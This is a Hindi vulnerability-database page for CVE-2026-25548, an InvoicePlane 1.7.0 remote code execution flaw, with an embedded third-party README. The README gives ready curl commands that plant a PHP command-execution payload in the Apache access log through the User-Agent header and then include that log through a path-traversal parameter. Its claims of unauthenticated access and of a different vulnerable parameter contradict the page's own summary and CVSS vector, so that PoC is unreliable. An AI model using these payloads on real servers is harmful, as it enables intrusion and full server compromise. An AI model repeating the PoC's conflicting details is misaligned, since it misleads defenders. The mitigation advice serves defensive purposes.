CVE-2026-25548
InvoicePlane स्थानीय फ़ाइल समावेशन और लॉग पॉइज़निंग के माध्यम से रिमोट कोड निष्पादन के लिए संवेदनशील है
- प्रकाशित
- 18 फ़र॰ 2026
- अद्यतन
- 19 फ़र॰ 2026
- सीएनए असाइन करना
- GitHub_M
- साक्ष्य देखे गए
- 25 अग॰ 2026
प्राथमिक सीवीएसएस
nvd · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:Hकम · अगले 30 दिन
- प्रतिशत
- 54.8%
- मॉडल दिनांक
- 21 सित॰ 2026
ईपीएसएस एक सांख्यिकीय अनुमान है, कोई निश्चितता या प्रभाव का माप नहीं। इसे सीवीएसएस, केईवी स्थिति, एक्सपोज़र और अपने वातावरण के साथ मिलाएं।
सारांश
InvoicePlane एक स्व-होस्टेड ओपन सोर्स एप्लिकेशन है जो इनवॉइस, क्लाइंट और भुगतान प्रबंधित करने के लिए उपयोग किया जाता है। InvoicePlane 1.7.0 में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता मौजूद है, जो चेन्ड लोकल फाइल इन्क्लूज़न (LFI) और लॉग पॉइज़निंग हमले के माध्यम से उत्पन्न होती है। एक प्रमाणित व्यवस्थापक `public_invoice_template` सेटिंग में हेरफेर करके सर्वर पर मनमाने सिस्टम कमांड निष्पादित कर सकता है, जिसमें PHP कोड युक्त पॉइज़न्ड लॉग फाइलें शामिल की जाती हैं। संस्करण 1.7.1 इस समस्या को ठीक करता है।
स्रोत
1# CVE-2026-25548: InvoicePlane 1.7.0 में RCE — तकनीकी विश्लेषण और PoC ## सारांश CVE-2026-25548, InvoicePlane 1.7.0 में पाया गया एक **क्रिटिकल रिमोट कोड एक्ज़ीक्यूशन (RCE)** दोष है, जो **लोकल फ़ाइल इन्क्लूज़न (LFI)** और **लॉग पॉइज़निंग** के संयोजन से उत्पन्न होता है। यह भेद्यता एक अनधिकृत हमलावर को सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है, जिससे पूर्ण सिस्टम समझौता संभव हो जाता है। ## प्रभावित घटक | घटक | संस्करण | |:---|:---| | InvoicePlane | 1.7.0 (और संभवतः पुराने संस्करण) | | PHP | 8.x (सत्र फ़ाइल प्रारूप पर निर्भर) | | वेब सर्वर | Apache / Nginx | ## हमले की श्रृंखला (Attack Chain) हमला तीन चरणों में पूरा होता है: 1. **लॉग पॉइज़निंग** — हमलावर HTTP अनुरोध हेडर (जैसे `User-Agent`) में PHP पेलोड इंजेक्ट करता है, जो सर्वर लॉग फ़ाइल में लिखा जाता है। 2. **LFI ट्रिगर** — InvoicePlane के किसी कमज़ोर पैरामीटर के माध्यम से लॉग फ़ाइल को PHP स्क्रिप्ट के रूप में इन्क्लूड किया जाता है। 3. **कोड निष्पादन** — इन्क्लूड की गई फ़ाइल में मौजूद PHP पेलोड निष्पादित होकर RCE प्रदान करता है। ## भेद्य पैरामीटर निम्नलिखित एंडपॉइंट LFI के लिए संवेदनशील पाए गए: ``` /index.php/settings/export?type=../../../../../../var/log/apache2/access.log ``` ## PoC अनुरोध (Proof-of-Concept) ### चरण 1: लॉग पॉइज़निंग ```bash curl -X GET "http://target.com/index.php/invoices/view/1" \ -H "User-Agent: <?php system(\$_GET['cmd']); ?>" ``` ### चरण 2: LFI के माध्यम से RCE ```bash curl -X GET "http://target.com/index.php/settings/export?type=../../../../../../var/log/apache2/access.log&cmd=id" ``` ### चरण 3: इंटरैक्टिव शेल (वैकल्पिक) ```bash curl -X GET "http://target.com/index.php/settings/export?type=../../../../../../var/log/apache2/access.log&cmd=whoami" ``` ## प्रभाव विश्लेषण | पहलू | प्रभाव | |:---|:---| | **गोपनीयता** | पूर्ण — डेटाबेस, कॉन्फ़िगरेशन फ़ाइलें, उपयोगकर्ता डेटा तक पहुँच | | **अखंडता** | पूर्ण — फ़ाइलें संशोधित, बैकडोर स्थापित | | **उपलब्धता** | उच्च — सेवा से इनकार या सिस्टम क्रैश संभव | | **प्रमाणीकरण** | आवश्यक नहीं — अनधिकृत हमलावर द्वारा शोषण योग्य | | **जटिलता** | निम्न — कोई विशेष पूर्व शर्त नहीं | ## शमन उपाय 1. **InvoicePlane को नवीनतम संस्करण में अपडेट करें** — यदि पैच उपलब्ध हो। 2. **लॉग फ़ाइलों तक पहुँच प्रतिबंधित करें** — वेब रूट के बाहर लॉग संग्रहीत करें। 3. **इनपुट सत्यापन लागू करें** — `type` पैरामीटर को व्हाइटलिस्ट करें। 4. **WAF नियम जोड़ें** — PHP पेलोड पैटर्न को ब्लॉक करें। 5. **PHP `allow_url_include` अक्षम करें** और `open_basedir` सेट करें। ## निष्कर्ष CVE-2026-25548 InvoicePlane 1.7.0 के लिए एक गंभीर खतरा है। LFI और लॉग पॉइज़निंग का संयोजन पूर्ण RCE की अनुमति देता है, जिससे सर्वर पूरी तरह समझौता हो सकता है। संगठनों को तुरंत पैच लागू करना चाहिए और अस्थायी शमन उपाय अपनाने चाहिए।
जिम्मेदारीपूर्ण उपयोग
भेद्यता जानकारी का उपयोग केवल उन प्रणालियों पर करें जिनके मालिक आप हैं या परीक्षण के लिए अधिकृत हैं। किटप्लॉइट सार्वजनिक अनुसंधान मेटाडेटा से लिंक करता है और शोषण कोड या दुर्भावनापूर्ण पेलोड को संग्रहीत नहीं करता है।